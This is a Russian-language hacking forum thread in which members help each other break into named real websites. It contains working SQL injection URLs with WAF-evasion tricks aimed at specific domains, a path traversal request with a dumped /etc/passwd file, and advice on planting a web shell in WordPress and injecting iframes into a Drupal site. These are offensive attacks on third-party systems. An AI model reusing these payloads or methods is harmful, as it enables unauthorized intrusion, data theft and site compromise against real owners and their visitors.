Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    или имя префикса замени на %23__

    максимум до чего дошел:
    Code:
    http://www.vijphoto.com/index2.php?id=-73+union%c0%4aselect+/*!1*/,/*!2*/,/*!3*/,/*!4*/,/*!5*/,/*!6*/,/*!7*/,/*!8*/,/*!9*/,/*!10*/,/*!11*/,/*!12*/,/*!13*/,/*!14*/,/*!15*/,/*!16*/,/*!17*/,/*!18*/,/*!19*/,/*!20*/,/*!21*/,/*!22*/,/*!23*/--+
    но вывода нет, хотя и запрос корректный вроде
    blind:
    Code:
    http://www.vijphoto.com/index2.php?id=73+and+substring(version(),1,1)=5--+
     
    _________________________
    #23641 yarbabin, 16 Nov 2014
    Last edited: 16 Nov 2014
    3 people like this.
  2. vikler

    vikler Member

    Joined:
    16 Aug 2012
    Messages:
    93
    Likes Received:
    7
    Reputations:
    0
    хм, то есть ничего не сделаешь, так?
     
  3. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    я пока пытаюсь обойти фильтрацию, а вам я предложил - раскручивайте, как слепую :)
     
    _________________________
  4. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    а так не?

    и смотри наверх... в тайтле вывод. 6 рентабельное поле
     
    _________________________
    7 people like this.
  5. vikler

    vikler Member

    Joined:
    16 Aug 2012
    Messages:
    93
    Likes Received:
    7
    Reputations:
    0
    оо спасибо @HAXTA4OK. Скинула вопрос в личку, чтоб тут не спамить
     
  6. vikler

    vikler Member

    Joined:
    16 Aug 2012
    Messages:
    93
    Likes Received:
    7
    Reputations:
    0
    Может кто ещё подскажет?
    Как фильтрацию дальше для from обойти? Лочат опять
    Code:
    http://www.vijphoto.com/index2.php?id=-73+/*!union*/+/*!select*/+/*!1*/,/*!2*/,/*!3*/,/*!4*/,/*!5*/,/*!mysql.user.password*/,/*!7*/,/*!8*/,/*!9*/,/*!10*/,/*!11*/,/*!12*/,/*!13*/,/*!14*/,/*!15*/,/*!16*/,/*!17*/,/*!18*/,/*!19*/,/*!20*/,/*!21*/,/*!22*/,/*!23*/+/*!from*/+/*!mysql.user*/--+
     
  7. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    www.vijphoto.com/index2.php?id=-73+/*!12345union*/+/*!select*/+/*!1*/,/*!2*/,/*!3*/,/*!4*/,/*!5*/,/*!table_name*/,/*!7*/,/*!8*/,/*!9*/,/*!10*/,/*!11*/,/*!12*/,/*!13*/,/*!14*/,/*!15*/,/*!16*/,/*!17*/,/*!18*/,/*!19*/,/*!20*/,/*!21*/,/*!22*/,/*!23*//*!from*//*!information_schema.tables*/where table_schema=database()+--+l
     
    5 people like this.
  8. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    http://www.vijphoto.com/index2.php?id=-73 /*!union*/ (select*from (select 1) a1 join (select 2) a2 join (select 3) a3 join (select 4) a4 join (select 5) a5 join (select 6) a6 join (select 7) a7 join (select 8) a8 join (select 9) a9 join (select 10) a10 join (select 11) a11 join (select 12) a12 join (select 13) a13 join (select 14) a14 join (select 15) a15 join (select version()) a16 join (select 17) a17 join (select 18) a18 join (select 19) a19 join (select 20) a20 join (select 21) a21 join (select 22) a22 join (select 23) a23)

    =)
     
    3 people like this.
  9. erwap

    erwap Member

    Joined:
    20 Sep 2012
    Messages:
    56
    Likes Received:
    16
    Reputations:
    0
    Code:
    index.php?cat=test'
    возвращает это:
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''test'' ORDER BY id DESC LIMIT 0, 9' at line 1

    Когда пытаюсь крутить срабатывает mod_security
    Обхожу так
    Code:
    http://execstyle.com/catPage.php?cat=test+/*!50000UNION*/+/*!50000SELECT*/+1,2,3,4,5,6,7,8,9,10+--+
    После этого я виже весь свой запрос на экране
    если поставить после test кавычку, возвращает следующее:
    The used SELECT statements have a different number of columns
     
  10. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    через error based всё вытягивает отлично
     
  11. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Очень интересный WAF. Заинтересовала возможность вывода именно "union+select" методом.

    Во-первых - там всего 1 поле.

    Во-вторых, фильтруется связка union+select. Обходится стандартно.

    В-третьих, фильтруются какие либо текстовые или числовые данные, следующие за select. Всё, кроме спецсимволов.

    Но селекция проходит при условия отсутствия union в запросе. Этим и объясняется возможность раскрутки Error-based вектором.

    Думаю над путями обхода, люблю WAF)
     
    _________________________
  12. erwap

    erwap Member

    Joined:
    20 Sep 2012
    Messages:
    56
    Likes Received:
    16
    Reputations:
    0
    BigBear, напиши потом, как получиться :)
     
  13. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    http://www.humidordiscount.com/cigar_clubs.php?selected_country=SG'+order+by+1+--+
    Подтолкните на мыслю какую нибудь :)
    Непонятно что и как фильтрует
     
  14. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    Там нету уязвимости.
     
    _________________________
  15. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    там есть уязвимость, но она в str и кавычки кодируются в %27, т. е. mq = on
    http://www.humidordiscount.com/cigar_clubs.php?selected_country=SG\

    PS. http://www.humidordiscount.com/tracking.php?language=1

    PS2.
    Code:
    http://www.humidordiscount.com/tracking.php?language=loll../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././
    Code:
    root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/bin/false daemon:x:2:2:daemon:/sbin:/bin/false adm:x:3:4:adm:/var/adm:/bin/false lp:x:4:7:lp:/var/spool/lpd:/bin/false sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/bin/false news:x:9:13:news:/usr/lib/news:/bin/false uucp:x:10:14:uucp:/var/spool/uucppublic:/bin/false operator:x:11:0:operator:/root:/bin/bash man:x:13:15:man:/usr/man:/bin/false postmaster:x:14:12:postmaster:/var/spool/mail:/bin/false cron:x:16:16:cron:/var/spool/cron:/bin/false ftp:x:21:21::/home/ftp:/bin/false sshd:x:22:22:sshd:/dev/null:/bin/false at:x:25:25:at:/var/spool/cron/atjobs:/bin/false squid:x:31:31:Squid:/var/cache/squid:/bin/false gdm:x:32:32:GDM:/var/lib/gdm:/bin/false xfs:x:33:33:X Font Server:/etc/X11/fs:/bin/false games:x:35:35:games:/usr/games:/bin/false named:x:40:40:bind:/var/bind:/bin/false postgres:x:70:70::/var/lib/postgresql:/bin/bash nut:x:84:84:nut:/var/state/nut:/bin/false cyrus:x:85:12::/usr/cyrus:/bin/false vpopmail:x:89:89::/var/vpopmail:/bin/false postfix:x:207:207:postfix:/var/spool/postfix:/bin/false smmsp:x:209:209:smmsp:/var/spool/mqueue:/bin/false portage:x:250:250:portage:/var/tmp/portage:/bin/false guest:x:405:100:guest:/dev/null:/dev/null nobody:x:99:99:nobody:/: domainfactory:x:502:502::/home/domainfactory:/bin/bash domcgi:x:520:520::/home/domcgi:/bin/bash sshd:!!:59968:532:sshd privsep:/var/empty:/bin/false mailnull:!!:47:47::/var/spool/mqueue:/sbin/nologin mysql:x:100:101:MySQL server:/var/lib/mysql:/bin/bash ldap:x:439:439:added by portage for openldap:/usr/lib/openldap:/sbin/nologin 
    дерзай ;)
     
    _________________________
    #23655 yarbabin, 29 Nov 2014
    Last edited: 29 Nov 2014
  16. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    Поднимаю актуальную тему - заливка шелла вордпресс , админка, права назапись в директории тем отсутствуют(You need to make this file writable before you can save your changes ), установка темы из файла просит пасс фтп .но я точно знаю что есть обход этого и возможность все-таки залить. (BigBear делал мне 1 раз такое)
    было видео по обходу,но его удалили с хостинга. Подскажите советом
     
    _________________________
    1 person likes this.
  17. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    "установка темы из файла просит пасс фтп" так шелл залился wp-content/uploads по дефолту, а так поищи в настройках чтото там media. Да и вообще просмотри все файлы темы т.к. есть вероятность что какой нибудь файл редактируется
    "права назапись в директории тем отсутствуют" найди путь путем ошибки тот же PHPSESSID, далее поменяй дефолтный путь wp-content/uploads на ../../home/var/www/test.com/test/ типа такого где имеется права на запись
     
    1 person likes this.
  18. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    собственно у меня вопрос, имеется drupal прав нет, каким образом можно проифреймить все страницы, может через админку, базу?
     
  19. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    а разве блоки в друпале не из бд берутся? Тогда можно было бы там и вписать свой код. или это только в 6.x ?


    2)
    есть ли варианты эксплотации sql в подобных случаях?

    HTML:
    http://www.phd-fitness.co.uk/store/search_products.php?search_string=%27&Search.x=0&Search.y=0
    когда реакция только на ковычку, и все. ?
     
  20. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    там примерно такой алгоритм:
    1. спецсимволы экранируются (кавычка станет \')
    2. из строки вырезаются кавычки (остается \) и из-за этого и возникает ошибка (получается что-то вроде WHERE search_str like '\'

    и еще меня там заблокировали, зайти не могу :)
     
    _________________________
    #23660 yarbabin, 3 Dec 2014
    Last edited: 3 Dec 2014
    1 person likes this.
Thread Status:
Not open for further replies.